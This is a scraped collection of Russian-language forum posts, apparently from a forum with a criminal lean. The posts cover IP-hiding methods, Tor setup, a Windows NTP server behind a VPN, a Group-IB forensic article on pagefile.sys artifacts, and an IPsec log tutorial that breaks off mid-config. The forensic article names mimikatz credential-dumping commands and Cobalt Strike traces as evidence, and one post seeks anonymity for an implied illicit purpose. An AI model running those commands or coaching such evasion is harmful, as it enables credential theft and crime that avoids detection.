Рассмотрим в качестве сервера для NTP windows 2019. Для установки сервера понадобится несколько программ proxifier, yogadns и vnc (удаленное управление, если хост виртуализации находится где-то далеко). По умолчанию NTP-сервер выключен, для его включения перейдем в редактор групповых политик (gpedit.msc) в конфигурация компьютера \ административные шаблоны \ система \ служба времени Windows \ поставщики времени. Тут собственно и включаем сервер

Возвращаемся на пункт назад и открываем «глобальные параметры конфигурации»

Нужно включить эту политику и изменить значение AnnounceFlags на 5. Также поставить на автоматическое включение службу времени, переходим в services.msc

Присваиваем айпи адрес этой виртуальной машине и можем проводить синхронизацию с нею. Однако, есть несколько дополнительных параметров, которые нужно установить, теперь на клиентской машине переходим в gpedit.msc и уже включаем NTP-клиент. Тут важными являются первые две строки

Если все сделано правильно, то выполним синхронизацию

Теперь на наших клиентах настроена автоматическая синхронизация, но время все же не точное. Поэтому, переходим на сервер и устанавливаем proxifier и yogadns (не обязательно, можно установить впн сразу на сервере). В proxifier создаем правило для проксификации 8.8.8.8 порт 443 на любой роутер. В yogadns создаем dns over https и вписываем правило разрешающее днс-запросы на *.time.nist.gov, а остальное заблокировать по умолчанию. Также в сетевом подключении нужно указать в качестве днса адрес 8.8.8.8. Переходим в редактор групповых политик и настраиваем NTP-клиент

SpecialPollinterval это частота синхронизации в секундах. Теперь сделаем синхронизацию, и у нас получится ошибка, ведь разрешилось только имя, а трафику некуда идти дальше. Поэтому, направляем трафик указав основной шлюз (трафик udp, проксифицировать не получится, нужно его направить на машину с впн). У меня много виртуальных машин, и для этих целей я задал отдельную сеть для синхронизации времени. Чтобы трафик пошел на впн, нужно прописать маршрутизацию. Сделаем синхронизацию снова

Способы скрытия IP-адреса в интернете

ID: 676533bbb4103b69df371c8e
Thread ID: 42827
Created: 2020-10-03T23:59:17+0000
Last Post: 2020-10-16T00:47:41+0000
Author: WGS
Prefix: Мануал/Книга
Replies: 5 Views: 1K

Способы скрытия IP-адреса в интернете

Прежде чем мы подробно рассмотрим известные технологии сокрытия своего настоящего IP-адреса, нам следует узнать свой IP-адрес и выяснить некоторые вещи, обличающие наш компьютер в сети, например адрес DNS-сервера. Для этого достаточно зайти на любой сервис проверки анонимности, напримерwww.whoer.net, главное чтобы он обладал интерактивной проверкой вашего компьютера с помощью Java, ActiveX, Flash и Javascipt. Изменить свой IP-адрес, например с помощью Socks или VPN, недостаточно, т.к. существует множество технологий, позволяющих его выявить, которые нужно либо отключить на своем компьютере, либо обмануть. Также не лишним будет изменить передаваемые НТТР-заголовки, это позволит «сбить» определение установленного ПО и географическое место расположения компьютера. Более детально проверить свой компьютер можно в расширенной версии www.whoer.net/ext

VPN (VPN - Virtual Private Network )

Внешне VPN-соединение мало чем отличается от подключения к обычной локальной сети: приложения вообще не почувствуют разницы и поэтому без какой-либо настройки будут использовать его для доступа в интернет. Когда одно из них захочет обратиться к удаленному ресурсу, на компьютере будет создан специальный GRE-пакет (Generic Routing Encapsulation, общая инкапсуляция маршрутов), который в зашифрованном виде будет отправлен VPN-серверу. VPN- сервер, в свою очередь, этот пакет расшифрует, разберется, в чем его суть (запрос на закачку какой-либо HTTP-страницы, просто передача данных и т.д.), и выполнит от своего лица (то есть засветит свой IP) соответствующее действие. Далее, получив ответ от удаленного ресурса, VPN-сервер поместит его в GRE- пакет, зашифрует и в таком виде отправит обратно клиенту.

Непрерывное шифрование передаваемых данных — это ключевой момент в обеспечении безопасности. PPTP-траффик может быть зашифрован с помощью MPPE (Microsoft Point-to-Point Encryption, поддерживает 40-, 56- и 128-битные ключи). Это майкрософтовский протокол. Ранние версии были чудовищно дырявы и элементарно взламывались, в новых грубые ошибки исправлены, но потуги майкрософта сделать что-то в области криптографии ничего кроме смеха не вызывают. Новые версии их протоколов просто особо не анализируют на предмет дыр.

Proxy, SOCKS

Прокси-сервер (от англ. proxy — «представитель, уполномоченный») — служба в компьютерных сетях, позволяющая клиентам выполнять косвенные запросы к другим сетевым службам.

Сначала клиент подключается к прокси-серверу и запрашивает какой-либо ресурс (например, файл), расположенный на другом сервере. Затем прокси-сервер подключается к указанному серверу, получает ресурс у него и передает клиенту.

То, к каким серверам и по каким протоколам мы может обращаться через прокси, зависит от типа этого прокси, т. е. протокола, по которому мы обращаемся к нему. Типов прокси существует несколько: HTTP-прокси, SOCKS4, SOCKS5 и некотрые другие.

HTTP-прокси наиболее распространены, их легче всего найти в интернете, но работают они только с HTTP (есть и https-прокси), к тому же могут вставлять в заголовки запроса адрес клиента, то есть быть не анонимными.

Протокол SOCKS наиболее примечателен тем, что он инкапсулирует протоколы не прикладного, а транспортного уровня, т.е. TCP/IP и UDP/IP. Поскольку только по этим протоколам возможна работа в Сети, через SOCKS можно работать с любыми серверами, в том числе и такими же SOCKS и, таким образом, организовывать цепочки SOCKS-серверов. По этой же причине все SOCKS-сервера анонимны — невозможно на уровне TCP/IP и UDP/IP передать дополнительную информацию, не нарушив работу вышестоящего протокола.

Еще можно выделить анонимайзеры — выглядят как обычный поисковик, только вместо слов/фраз в них нужно вводить URL того сайта, который ты хотел бы посмотреть. Анонимайзеры представляют собой скрипты, написанные, например, на perl, php, cgi-скрипты.

**_TOR

Tor **(The Onion Router) — свободная (BSD) реализация второго поколения onion router (так называемая «луковая (многослойная) маршрутизация»). Система, позволяющая пользователям соединяться анонимно, обеспечивая передачу пользовательских данных в зашифрованном виде. Рассматривается как анонимная сеть, предоставляющая анонимный web-сёрфинг и безопасную передачу данных. С помощью Tor пользователи смогут сохранять анонимность при посещении web- сайтов, публикации материалов, отправке сообщений и работе с другими приложениями, использующими протокол TCP. Безопасность трафика обеспечивается за счёт использования распределённой сети серверов, называемых «многослойными маршрутизаторами» (onion routers).

Пользователи сети Tor запускают onion-proxy на своей машине, данное программное обеспечение подключается к серверам Tor, периодически образуя виртуальную цепочку сквозь сеть Tor, которая использует криптографию многоуровневым способом (аналогия с луком — англ. onion).

Каждый пакет, попадающий в систему, проходит через три различных сервера (нода), которые выбираются случайным образом. Перед отправлением пакет последовательно шифруется тремя ключами: сначала для третьей ноды, потом для второй, и, в конце концов, для первой.

Когда первая нода получает пакет, она расшифровывает «верхний» слой шифра (аналогия с тем, как чистят луковицу) и узнает, куда отправить пакет дальше. Второй и третий сервер поступают аналогичным образом. В то же время, программное обеспечение onion-proxy предоставляет SOCKS-интерфейс. Программы, работающие по SOCKS-интерфейсу, могут быть настроены на работу через сеть Tor, который, мультиплексируя трафик, направляет его через виртуальную цепочку Tor, что в конечном итоге позволяет обеспечивать анонимный сёрфинг в сети.

Cуществуют специальные надстройки Tor для веб-браузеров Opera, Firefox.

SSH-туннелинг_

SSH _(Secure Shell) — сетевой протокол, позволяющий производить удалённое управление компьютером и передачу файлов. Использует алгоритмы шифрования передаваемой информации.

SSH-туннелинг можно рассмотреть в качестве дешевой замены VPN. Принцип данной реализации следующий: весь сетевой софт на компьютере форвардится на назначенный порт (вашего локалхоста), на котором висит сервис, соединенный по SSH с сервером (а как мы знаем, соединение по SSH протоколу шифруется) и туннелирующий все запросы; далее весь ваш трафик (уже не в зашифрованном виде) может форвардится с сервера на прокси (поддерживающий туннерирование) или сокс, которые передают весь трафик к необходимым адресам. Наличие прокси или сокса не обязательно.

Какие плюсы данной системы:
1. Для организации данной схемы не нужно устанавливать серверный софт (т.к. SSH-аккаунт и сокс можно без проблем достать в интернете);
2. Т.к. при SSH-соединении трафик шифруется и сжимается, то мы получаем небольшой прирост скорости работы в инете (это верно, когда сокс-демон находится на том же сервере);
3. В случае, когда сокс-сервер находится на другом хосте, то мы получаем дополнительную цепочку серверов, которые повышают нам безопасность и анонимность._

JAP

_В одном из немецких институтов был разработан довольно хитрый способ сохранения анонимности. В систему пользователя устанавливается специальная прокси-программа JAP, которая принимает все запросы пользователя на подключения, криптует (AES с 128-bit длиной ключа) и в безопасном режиме отправляет на специальный промежуточный сервер (так называемый микс). Дело в том, что микс одновременно использует огромное количество пользователей, причем система построена так, чтобы каждый из них был неразличим для сервера. А поскольку все клиенты одинаковые, то и вычислить конкретно одного пользователя не представляется возможным.

Миксы обычно устанавливаются на добровольных началах, в основном в университетах, которые официально подтверждают, что не ведут никаких логов. К тому же обычно используются цепочки миксов, как правило 3 микса._

Ultrasurf

Ultrasurf — бесплатная утилита для обхода цензурных ограничений в Интернете, созданная компанией UltraReach в 2002 году. Программное обеспечение было разработано китайскими диссидентами как средство, позволяющее пользователям Интернета в КНР обойти Великий Китайский файрвол.

Ultrasurf является бесплатным для загрузки и не требует установки. Ultrasurf не устанавливает никаких дополнительных файлов на компьютере пользователя и не оставляет следов в реестре после его выхода.

Программное обеспечение работает путём создания зашифрованного туннеля HTTPS между компьютером пользователя и центральной базой собственных прокси- серверов, что позволяет пользователям обходить брандмауэры. Программное обеспечение использует сложные, собственные технологии антиблокировки для преодоления фильтрации и цензуры в Интернете.

**_Нестандартные способы определения IP адреса.

Cookies_**

Вообще IP адрес с помощью Cookies не определить. Однако, при первом входе на веб сайт, IP адрес клиента (определенный сервером, т.е. IP proxy) сервер может сохранить в Cookies. А когда Вы в следующий раз входите на сайт, сервер вновь определяет Ваш IP и сравнивает его с сохраненным в Cookies. И если IP адреса старый и новый различаются, сервер может сделать выводы. И если Вы не запретите у себя Cookies, никакой proxy Вам не поможет.

JavаScript

JavаScript - это скрипты предназначены для выполнения активных сценариев на вашем компьютере. Они довольно простые, и имеют ограниченные функции, но они могут определить реальный IP и множество других настроек браузера.
Единственным решением может быть отключение скриптов в браузере.

Java

Java – это в отличии от предыдущего, полноценный язык программирования и программа написанная на этом языке может без особых трудностей определить ваш реальный IP.
Для защиты существует лишь одно решение: полное отключение Java, так как она имеет очень много различных сетевых функций и проблематично запретить их все.

ActiveX

Это полноценные программы которые выполняются на компьютере пользователя. Возможности у них еще лучше чем у 2 предыдущих. Они могут легко определить любые настройки браузера и вычислить Ваш настоящий IP адрес и даже легко изменить настройки прокси.
Защитой от них является полный запрет ActiveX.
Если вы запретили Cookies выполнение активных сценариев, Java и ActiveX, то сбить такую защиту достаточно просто: нужно всего лишь построить сайт на основе Java / JavаScript / Cookies / Action X , и тогда пользователю ничего не останется как разрешить все это в браузере.
Но все же, если вы хотите остаться анонимными, и чтобы Java / JavаScript / Cookies / Action X были – есть выход. Это FIREWALL, в котором необходимо запретить все соединения, кроме соединения с прокси или VPN сервером

СОРМ(Система технических средств по обеспечению оперативно-розыскных мероприятий по мониторингу документированного оборота информации)

Изначально СОРМ планировалась в одном из НИИ КГБ СССР, там же была закончена разработка ее тактико-технического обоснования и соответствующих спецификаций. По мере совершенствования технических средств связи совершенствовалась и эта система. Сейчас во многих городах функционируют COРМ, СOРМ-2. Они существуют там, где есть Интернет, телефон, т.е. современные средства коммуникации. В 1998 году разработаны технические условия на следующую систему - СОРМ-2. Она создавалась уже и на сетях документальной электросвязи. В соответствии с документами, Интернет-провайдер на свои деньги был обязан установить оборудование, программы и выделенную линию для местного отделения ФСБ, а также провести обучение сотрудников.

Все это позволяет последним отслеживать, перехватывать и прерывать связь любого клиента этого провайдера. О любом пользователе "паутины" можно знать: имеет ли он пристрастие к политическим новостям, или к порнографическим сайтам, проследить его "электронные" покупки, банковские платежи. На данный момент практически все российские провайдеры провели работы по подключению к системе СОРМ 2.

(с) Mazzz, доработал и дописал (c)WGS.

посоветуйте нормальный способ анонимизации доступа в интернет, я думаю понимаете для чего

ID: 676533bbb4103b69df371c90
Thread ID: 40076
Created: 2020-07-27T17:47:26+0000
Last Post: 2020-10-11T14:24:55+0000
Author: kolan33
Replies: 9 Views: 1K

посоветуйте нормальный способ анонимизации доступа в интернет, я думаю понимаете для чего

Tor Network

ID: 676533bbb4103b69df371c9a
Thread ID: 40687
Created: 2020-08-09T00:19:32+0000
Last Post: 2020-09-24T19:15:58+0000
Author: theblacktr
Replies: 8 Views: 1K

How can we connect to Tor Network without the TOR browser? There are very various ways. But how to make this connection with using virtual machine or chrome extension?

как настроить маршрут TOR браузера?

ID: 676533bbb4103b69df371c9b
Thread ID: 42394
Created: 2020-09-23T08:46:15+0000
Last Post: 2020-09-24T18:44:47+0000
Author: Tiger
Replies: 7 Views: 1K

сейчас постоянно сталкиваюсь с такими цепочками:
сша-сша-сша
сша-канада-сша
сша-сша-канада

хочется цепочку с разными странами вида:
сша-канада-мексика

как настроить маршрут TOR браузера без повторения одинаковых стран в нодах?

Можно ли найти человека по голосу?

ID: 676533bbb4103b69df371c9f
Thread ID: 42039
Created: 2020-09-13T14:46:08+0000
Last Post: 2020-09-14T12:00:42+0000
Author: negg
Replies: 10 Views: 1K

Представим что голос - лишь единственный идентификатор личности в интернете. Я отправил голосовую. Меня смогут найти? По голосу возможно найти человека? Допустим в рашке. Если взять миллионов 80 и больше

Проксификация программ через Tor на Win + Отключаем утечку.

ID: 676533bbb4103b69df371ca2
Thread ID: 40277
Created: 2020-08-01T07:59:41+0000
Last Post: 2020-09-07T04:03:16+0000
Author: Adam
Replies: 9 Views: 1K

Лёгкая программа управления firewall на Windows: https://github.com/henrypp/simplewall/releases
Tor Bundle - Tor сервис на порту 9050: https://www.torproject.org/download/tor/

Так как firewall очень прост в управлении и имеет русский интерфейс, в настройках сами покопайтесь. Там же настройте запуск при включении системы. Кстати в нём есть пункты отключения телеметрии и серверов Windows. Он не сразу запускается, поэтому авто-подключение к точке доступа wifi лучше отключить.

Настраиваем автозапуск Tor сервиса, для этого открываем с правами админа powershell, переходим в папку где лежит разархивированный Tor.exe, пишем команду tor.exe --service install. После включения windows будет запускаться сервис Tor. Разрешите firewall только программу tor.exe, тогда утечек мимо tor не будет.

Тайны файла подкачки pagefile.sys: полезные артефакты для компьютерного криминалиста

ID: 676533bbb4103b69df371ca9
Thread ID: 41325
Created: 2020-08-25T20:44:41+0000
Last Post: 2020-08-25T20:44:41+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 1K

В одной крупной финансовой организации произошел неприятный инцидент: злоумышленники проникли в сеть и «пылесосили» всю критически важную информацию — копировали, а затем отправляли данные на свой удаленный ресурс. Криминалистов Group-IB призвали на помощь лишь спустя полгода после описываемых событий…. К тому времени часть рабочих станций и серверов была уже выведена из работы, а следы действий злоумышленников уничтожены из-за использования ими специализированного ПО и из-за неправильного логирования. Однако на одном из серверов, участвовавших в инциденте, был обнаружен файл подкачки Windows, из которого эксперты получили критически важную информация об инциденте.

В этой статье Павел Зевахин, специалист Лаборатории компьютерной криминалистики Group-IB, рассказывает о том, какие данные можно обнаружить в ходе криминалистического исследования в файлах подкачки Windows.

Часть 1. Что скрывают pagefile.sys

Итак, pagefile.sys — это файл подкачки операционной системы Windows. При нехватке оперативной памяти Windows резервирует определенное место на жестком диске и использует его для увеличения своих возможностей. Иными словами, выгружает часть данных из оперативной памяти в файл pagefile.sys. Очень часто необходимые для исследователя сведения остаются только в файле подкачки.

Выгрузка в файл подкачки происходит постранично, блоками по 4 Кб, поэтому данные могут занимать как непрерывную область в файле подкачки, так и находиться в разных его частях. Это означает, что в большинстве случаев информация, обнаруженная в этом файле, будет извлекаться с потерей целостности.

Размер pagefile.sys в файловой системе по умолчанию задается операционной системой, но пользователь всегда может отключить файл подкачки или изменить его максимальный размер. Стандартное расположение файла — в корне системного раздела, но он может находиться и на любом другом логическом диске — в зависимости от того, куда пользователь его поместил. Нужно помнить этот факт.

Прежде чем мы займемся извлечением pagefile.sys, надо понять, что это за файл с точки зрения файловой системы. Для этого воспользуемся ПО AccessData FTK Imager:

Hidden| True| Owner SID| S-1-5-32-544
---|---|---|---
System| True| Owner Name| Администраторы
Read Only| False| Group SID| S-1-5-18
Archive| True| Group Name| SYSTEM

Видно, что это скрытый системный файл, который так просто не скопировать.

Как тогда получить этот файл? Сделать это можно несколькими способами:

если вы работаете с активной операционной системой, то для извлечения используем ПО FTK Imager или KAPE Эрика Циммермана

если есть цифровая копия накопителя или же сам файл — просто копируем файл или работаем с ним напрямую.

Не забываем, что файлы pagefile.sys могут находиться в теневых копиях (Volume Shadow Copy) и на других логических дисках. Правда, бывают случаи, когда правила теневого копирования задает сам пользователь и исключает копирование файла подкачки (в системном реестре есть ветвь HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\BackupRestore\FilesNotToSnapshot, где указываются файлы, которые будут исключены из теневого копирования).

На изображении ниже можно увидеть, как меняется объем обнаруженных данных в текущем файле подкачки (на изображении — крайний левый) и файлах подкачки, которые были извлечены с этого же накопителя из теневых копий, созданных в разное время.

Важный момент, о котором стоит помнить: начиная со сборки 10525 Windows 10 используется компрессия файла подкачки. При нехватке памяти система сжимает неиспользуемые ресурсы памяти в каждом процессе, позволяя большему количеству приложений оставаться активными одновременно. Для декомпрессии такого файла необходимо использовать специализированное ПО.

Click to expand...

Например, можно использовать для декомпрессии утилиту winmem_decompress Максима Суханова:

Это будет полезным, когда поиск в изначальном файле подкачки результатов не дал или же необходимые данные находились в сжатом виде.

Итак, когда файл pagefile.sys у нас в руках, можно приступать к его исследованию. И тут надо выделить две ситуации: первая — когда мы знаем, что искать, и вторая — когда не знаем. В первом случае это могут быть фрагменты файлов, следы работы того или иного ПО, какая-то пользовательская активность. Для такого поиска обычно используется шестнадцатеричный редактор X-Ways WinHEX (или любой другой). Во втором случае придется полагаться на специализированное ПО, например, MAGNET AXIOM, Belkasoft Evidence Center, утилиту strings (ее можно считать основной и наиболее часто используемой), ПО Photorec (ПО для восстановления, использующее сигнатурный метод), в некоторых случаях применять yara-правила (при условии настройки сканирования файлов большого размера) — или же просто просматривать файл вручную.

А что можно найти в файле pagefile.sys, и почему мы делаем акцент на файле подкачки? Все просто: это данные, частично выгруженные из оперативной памяти, то есть процессы, файлы и прочие артефакты — то, что было активно и функционировало в ОС. Это может быть часть интернет-истории и IP-адреса, информация о запуске каких-то файлов или же сами файлы, фрагменты изображений и текстов, сведения о сетевых запросах функционировавшего ранее ПО, следы работы вредоносного ПО в виде журналов нажатых клавиш, системные файлы и журналы ОС и много всего другого.

![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2F_m%2Fk-%2Fub%2F_mk- ubrzxotib1mmzvdfyxtrg8e.png&hash=8bcc3a1c7a42aeecba1fa02fe8703480)

Идем в поля

Пора переходить непосредственно к реальным делам и исследованиям. Итак, что полезного можно найти в файле подкачки Windows с точки зрения цифровой криминалистики?

В одном из кейсов исследовался образ накопителя, зараженного разным вредоносным ПО, при помощи которого злоумышленники похитили деньги со счета организации.

Чтобы дать полный ответ, что произошло и как, криминалисту необходимо установить начальную точку заражения, используемый злоумышленниками инструментарий и последовательность действий. В ходе исследования удалось найти не все следы функционирования вредоносного ПО. И вот тут был проанализирован pagefile.sys. Как мы уже знаем, там можно найти страницы из памяти процессов, выгруженные из оперативной памяти в файл подкачки, которые иногда можно восстановить, например, при помощи ПО Photorec сигнатурным методом, как и было сделано в данном кейсе.

При этом нужно отметить следующее: так как в файле подкачки лежат уже выгруженные из оперативной памяти процессы (файлы), то их адресация будет отличаться от адресации оригинальных файлов. К тому же они могут быть сильно фрагментированы, поэтому запустить такой исполняемый файл зачастую нельзя, да и все другие файлы, как правило, будут иметь повреждения внутренней структуры из-за фрагментации, ведь сигнатурное восстановление не может само найти все фрагменты файла и расставить их в правильном порядке.

Click to expand...

Выше представлен пример файлов (Photorec присвоил файлам имена, исходя из смещения относительно начала файла подкачки), выгруженных в ходе проведения этого исследования. Мы видим, что это исполняемые, графические, текстовые и иные файлы. Дальше все просто: анализируем их, исходя из необходимых критериев и задач.

В конкретном случае из файла подкачки были восстановлены dll-файлы, в которых есть вредоносный код. Ниже приведен пример их детектов на VirusTotal (поиск осуществлялся по контрольной сумме файлов):

В ходе анализа был установлен адрес удаленного сервера, с которым могли взаимодействовать эти файлы. При помощи шестнадцатеричного редактора X-Ways WinHEX в исследуемом pagefile.sys обнаружены строки, содержащие адреса удаленного сервера. Это говорит о том, что обнаруженные файлы функционировали в ОС и активно взаимодействовали со своим удаленным сервером. А вот и детекты сервиса VirusTotal за декабрь 2018 года:

Таким образом, в данном кейсе благодаря обнаруженным в pagefile.sys сведениям мы установили всю цепочку заражения.

А что еще?

Существуют порой уникальные случаи, когда в файле подкачки помимо иных следов можно найти закодированные в base64 снимки экрана. Например, такие при отправке создает банковский троян Buhtrap.

В конкретном случае начало файла было следующим: /9j/4AAQSkZJRgABAQEAYABgAAD/. Это заголовок jpeg-файла, закодированный в base64 (представлена часть изображения):

Вышеуказанный фрагмент скопировали, декодировали и добавили к нему расширение jpg. Нам повезло, и обнаруженный скриншот содержал полный снимок активного рабочего стола бухгалтерского компьютера с открытым ПО «1С: Бухгалтерия», на котором отображался финансовый баланс предприятия и прочие важные данные. Другие обнаруженные закодированные изображения из-за особенности хранения информации в файле подкачки были неполными (битыми).

Другой пример. В ходе одного из инцидентов обнаружены следы фреймворка Cobalt Strike (характерные строки в файле подкачки — SMB mode, status_448, ReflectiveLoader):

И впоследствии можно попытаться выгрузить модули. На изображении выше это keylogger.dll и screenshot.dll, но могут быть и другие.

Идем дальше. Входящий в Cobalt Strike и часто используемый злоумышленниками модуль mimikatz — это инструмент, реализующий функционал Windows Credentials Editor и позволяющий извлекать аутентификационные данные залогинившегося в системе пользователя в открытом виде. Именно в файле подкачки были обнаружены следы его функционирования, а именно следующие символьные строки:

sekurlsa::logonPasswords — извлечение логинов и паролей учетной записи

token::elevate — повышение прав доступа до SYSTEM или поиск токена администратора домена

lsadump::sam — получение SysKey для расшифровки записей из файла реестра SAM

log Result.txt — файл, куда записываются результаты работы ПО (не забываем поискать этот файл в файловой системе):

Следующий пример — следы функционирования банковского трояна Ranbyus, который состоит из множества модулей. В ходе одного исследования в файле подкачки, который находился в теневой копии (VSS), обнаружили строки, сформированные дополнительным модулем, расширяющим функциональные возможности ПО Ranbyus. Строки содержали, помимо всего прочего, и введенные аутентификационные данные пользователя (логин и пароль) в системе «клиент-банк». А в качестве примера — часть сетевого запроса, включая сведения об управляющем сервере, который был обнаружен в файле pagefile.sys:

На самом деле довольно часто можно встретить примеры POST-запросов вредоносного ПО к своим управляющим серверам, а также ответы этих серверов на запросы. Ниже приведены такие случаи на примере взаимодействия ПО Buhtrap со своим управляющим сервером:

Теперь вспомним про кейс, с которого мы начинали этот пост. В крупной организации с множеством серверов и рабочих станций произошел инцидент, в ходе которого злоумышленники проникли в сеть, завладели учетными данными одного из администраторов контроллера домена и далее перемещались по сети, используя легитимное ПО. Они копировали критически важную информацию, а затем отправляли эти данные на удаленный ресурс. На момент реагирования прошло более полугода, часть рабочих станций и серверов уже были выведены из работы, а следы действий злоумышленников уничтожены «благодаря» использования ими специализированного ПО и из-за неправильного логирования.

В процессе реагирования мы вышли на сервер с ОС Windows Server 2012, участвовавший в инциденте. Файлы системных журналов уже не один раз перезаписаны, а свободное дисковое пространство затерто. Но там был файл подкачки! Благодаря долгой работе сервера без перезагрузки и большому объему файла подкачки в нем сохранились следы запуска ПО злоумышленников и скриптов, которые на момент исследования уже отсутствовали в файловой системе без возможности восстановления. Сохранились и сведения о каталогах и файлах (пути и имена), которые создавались, копировались и впоследствии удалялись злоумышленниками, IP-адреса рабочих станций организации, откуда копировались данные, и прочая важная информация.

Что интересно, автоматизированный анализ при помощи различного криминалистического ПО полных результатов не дал, каких-то определенных критериев поиска не было, поэтому специалисты прибегли к ручному анализу файла подкачки, используя шестнадцатеричный редактор X-Ways WinHEX.

Ниже несколько примеров того, что обнаружили специалисты:

![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2F15%2Fyc%2Fpb%2F15ycpbnqeyz- bvnzokk3idss2ug.png&hash=c0d047bbb64a872663cfac41771ab6d7)

Сведения об использовании утилит pcsp.exe и ADExplorer.exe (присутствуют и даты, и пути).

Дальше — сведения об использовании vbs-скрипта (на изображении — начало и конец).
Примечательно, что указаны учетные данные (логин и пароль) одного из администраторов контроллера домена, которые ранее были скомпрометированы:

![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fcb%2Fus%2Fgo%2Fcbusgoj_24d_k- miiegm6xt8i9a.png&hash=05c07239a540a0dcf3d8ec01fd81d3da)

В результате почти вся критически важная информация о произошедшем инциденте была обнаружена именно в файле подкачки одного из серверов. Установлен инструментарий злоумышленников и часть их действий в сети организации.

Ну и в завершение, конечно же, стоит упомянуть про остальные артефакты, такие как данные о посещении интернет-сайтов (иногда можно обнаружить сведения об использовании электронных почтовых ящиков), сведения о файлах и каталогах:

![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fp5%2Faa%2Fkj%2Fp5aakj- wkb29nz2fqv7xqfzxm2e.png&hash=751a98358f733bd024a0c9a54f4a20f8)

![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fpl%2F59%2Fvl%2Fpl59vli_ytsbieeligdlowq- u-m.png&hash=f1db91a872662ad2c3a3045885b66484)

Можно обнаружить и такую информацию, как имя компьютера и серийный номер тома, где располагался файл подкачки:

А также информацию из файлов Prefetch и, конечно же, системные журналы Windows.

Итак, pagefile.sys действительно может содержать большое количество различных артефактов, которые могут помочь в анализе. Именно поэтому никогда не стоит игнорировать исследование файла подкачки. Даже если есть у вас есть все необходимые данные — все равно исследуйте pagefile.sys. Практика показывает, что там может находиться что-то недостающее и важное.

Гадание по логам IPsec. На практике разбираем протокол IKE

ID: 676533bbb4103b69df371caa
Thread ID: 41163
Created: 2020-08-21T12:26:53+0000
Last Post: 2020-08-21T12:26:53+0000
Author: pablo
Prefix: Статья
Replies: 0 Views: 1K

IPsec задумывался как универсальный стек протоколов для VPN, после которого никаких других уже не нужно. Само существование OpenVPN, WireGuard и множества других протоколов доказывает, что достичь своей цели разработчикам IPsec не удалось.

Цена абсолютной универсальности и гибкости — чрезмерная сложность протокола, а значит, и сложность его настройки и отладки. Кроме того, первая версия IPsec разрабатывалась совсем в другое время, когда динамических адресов, NAT и мобильных подключений не существовало. Поменять архитектуру протокола было уже невозможно, поэтому он оброс расширениями и стал еще сложнее.

Казалось бы, можно просто забыть его как страшный сон и пользоваться более удобными решениями вроде того же OpenVPN. Но не все так просто — IPsec остается единственным общепризнанным стандартом и единственным протоколом, который поддерживает сетевое оборудование всех производителей.

Сервисам VPN, призванным повысить приватность, никто не диктует, что использовать, поскольку на их серверах и клиентах ОС общего назначения, на которую можно поставить что угодно. В корпоративных сетях такой свободы выбора может и не быть. А уж если ты соединяешь две сети на оборудовании разных поставщиков, то выбора может не быть вообще — только IPsec.

В общем, если ты занимаешься сетевым администрированием, избежать работы с IPsec вряд ли получится, несмотря на всю его сложность и неудобства. И если бы все ограничивалось сложностью самого протокола! Зачастую «веселья» добавляют различия реализаций, разные умолчания в них и не вполне адекватные админы на другой стороне, от которых не дождешься никакой отладочной информации. В этом случае настройка и отладка туннелей превращается в гадание по логам.

При этом логи IPsec зачастую полны специфичной терминологии и легко могут смутить новичка, еще незнакомого с протоколом в деталях. В этой статье мы рассмотрим ряд возможных ошибок настройки и их проявления в логах.

В качестве примера мы возьмем strongSwan. Эта свободная реализация IPsec (вернее, протокола IKE) весьма популярна и используется многими дистрибутивами Linux и FreeBSD для сетевых устройств: OpenWRT, pfSense, Sophos, VyOS и другими.

Основы
Протокол IPsec состоит из двух частей: протокола IKE (Internet Key Exchange) и протоколов AH и ESP (Authentication Header и Encapsulated Security Payload).

Протоколы AH и ESP отвечают за шифрование трафика и его аутентификацию с помощью встроенных в заголовок пакета подписей, они реализованы в ядре ОС или в аппаратной части маршрутизатора. Для их работы требуется согласование параметров шифрования. Набор из селекторов трафика и настроек, который указывает ядру, какой трафик и как шифровать, называется security association (SA). Во многих системах их можно настроить вручную. Например, в Linux это делается командой [ip xfrm](https://www.man7.org/linux/man-pages/man8/ip- xfrm.8.html). На практике этот метод почти не используется из-за трудоемкости.

Для автоматизации обмена ключами и согласования настроек применяется протокол IKE. Его реализация — это обычно процесс в пространстве пользователя, который сам по себе никакой трафик и не шифрует, а просто создает security associations в ядре (в Linux — по протоколу netlink). Именно IKE обычно настраивают сетевые администраторы, и именно на этапе согласования параметров туннеля всплывают все ошибки и несовместимости в настройках.

Практика
Итак, давай развернем небольшой тестовый полигон, а потом разберемся непосредственно с логами.

Поднимаем туннель
Прежде всего нам понадобятся две машины с установленным strongSwan версии 5.2 или выше. Назовем их east и west. Присвоим им условные адреса 192.0.2.10 и 203.0.113.10.

Сети 192.0.2.0/24, 198.51.100.0/24 и 203.0.113.0/24 специально зарезервированы для примеров и документации в RFC 5737. Условные публичные адреса правильнее всего брать именно из них.
![Топология сети](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F43b98bf97cea6298dbe5937a79bf747f%2F14559%2Fipsec- diagram.png&hash=433fc2da11db1a64e73e84d7ecc96410)
Топология сети

Для простоты мы ограничимся статическим общим ключом (pre-shared key), хотя strongSwan поддерживает и ключи RSA, и сертификаты x.509.

Сначала создадим /etc/ipsec.conf и /etc/ipsec.secrets для east.

Code:Copy to clipboard

config setup conn tunnel-west left=192.0.2.10 right=203.0.113.10 leftsubnet=10.20.30.0/24 rightsubnet=10.40.50.0/24 leftsubnet=10.20.30.0/24 ike=aes128-sha1-modp2048! keyexchange=ikev2 reauth=no ikelifetime=28800s closeaction=none esp=aes128-sha1! keylife=3600s rekeymargin=540s type=tunnel compress=no authby=secret auto=start keyingtries=%forever

Code:Copy to clipboard

192.0.2.10 203.0.113.10 : PSK "qwerty"

Теперь создадим /etc/ipsec.conf и /etc/ipsec.secrets для west.

Code:Copy to clipboard

